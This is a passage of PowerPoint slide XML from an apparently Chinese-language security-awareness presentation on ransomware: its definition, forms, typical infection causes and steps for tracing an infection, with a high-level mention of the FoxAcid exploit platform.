        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选举日对于安全行业来说，不亚于一场网络攻防的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>超级碗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”大赛。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715135" y="4924425"/>
            <a:ext cx="4634865" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>勒索软件可以'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更改投票记录'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>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“酸狐狸”漏洞攻击武器平台（FoxAcid）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520065" y="1139825"/>
            <a:ext cx="10737215" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“酸狐狸”平台一般结合“QUANTUM（量子）”和“SECONDDATE（二次约会）”等中间人攻击武器使用，对攻击目标实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络流量劫持并插入恶意XSS脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，根据任务类型和实际需求，XSS脚本的漏洞利用代码可能来自一个或多个酸狐狸平台服务器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该漏洞攻击武器平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>集成了各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主流浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的零日（0day）漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可智能化配置漏洞载荷针对IE、火狐、苹果Safari、安卓Webkit等多平台上的主流浏览器开展远程漏洞溢出攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击过程中该平台结合各类信息泄露漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对目标系统实施环境探测，并依据探测结果对漏洞载荷进行匹配筛选，选择合适的漏洞开展攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。如果目标价值很高，且目标系统版本较新、补丁较全，该平台会选择利用高价值零日漏洞实施攻击；相反，如果目标价值较低且系统版本老旧，该平台会选择较低价值的漏洞甚至已公开漏洞实施攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一旦漏洞被触发并符合入侵条件，就会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向目标植入间谍软件，获取目标系统的控制权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，从而实现对目标的长期监视、控制和窃密。</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勒索病毒定义</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066290" y="982980"/>
            <a:ext cx="9335135" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>勒索软件是一种恶意软件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马或其他类型的病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>），它能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>锁定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>用户设备或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>用户文件，然后通知用户必须</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>支付赎金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>才能拿回自己的数据。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>赎金并不低，但不能保证一定能成功解密。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335530" y="3239135"/>
            <a:ext cx="8796655" cy="3390900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084070" y="2409190"/>
            <a:ext cx="9335770" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>开始勒索病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017年wannacry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>肆意传播，再到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2020年WannaRen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过各大下载资源站传播。勒索病毒越来越疯狂。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勒索病毒形式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647190" y="781685"/>
            <a:ext cx="10240645" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改电脑开机密码、登录密码等对锁定电脑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪装为安全机构恐吓用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，比如Reveton敲诈者病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密用户文件和数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，比如WannaCry、CryptoLocker、VirLock、Locky。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>篡改磁盘MBR，加密电脑整个磁盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，比如Petya。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2715260"/>
            <a:ext cx="5734050" cy="3867150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191885" y="2762885"/>
            <a:ext cx="5695950" cy="381952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55651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中勒索病毒原因</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="782320"/>
            <a:ext cx="9888855" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开启了远程桌面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> ，设置的密码太简单、或使用初始密码，被登录投毒。太简单、或使用初始密码，被登录投毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下载了激活工具或者破解软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>导致中毒文件被加密。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设置了共享文件夹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，局域网内有其它机器中招，导致共享文件夹的数据被其它机器的病毒加密。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>运行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>钓鱼邮件中的附件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>导致中毒文件被加密。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>系统中存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>导致中毒文件被加密，比如永恒之蓝漏洞，java漏洞，weblogic漏洞，泛微OA漏洞等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U盘蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>导致文件被加密。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>其它弱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>口令攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，例如mysql，tomcat等。</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459105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中勒索病毒后的正确操作姿势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10795" y="781685"/>
            <a:ext cx="12040870" cy="5460365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092325" y="2068195"/>
            <a:ext cx="2891790" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>建议不要用GHOST版本系统安装：有非常多的系统漏洞和预装软件的后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接箭头连接符 3"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4984115" y="2371090"/>
            <a:ext cx="2851785" cy="158115"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>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找准中毒原因</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071370" y="1290320"/>
            <a:ext cx="9361170" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1.从各类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络设备的日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>中查找异常（防火墙日志）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2.从服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统安全日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>查找异常；（windows安全日志，下图中日志被黑客清空了）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3.从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>查找异常；（客户端异常登录日志）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>利用网络上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>免费的病毒溯源工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
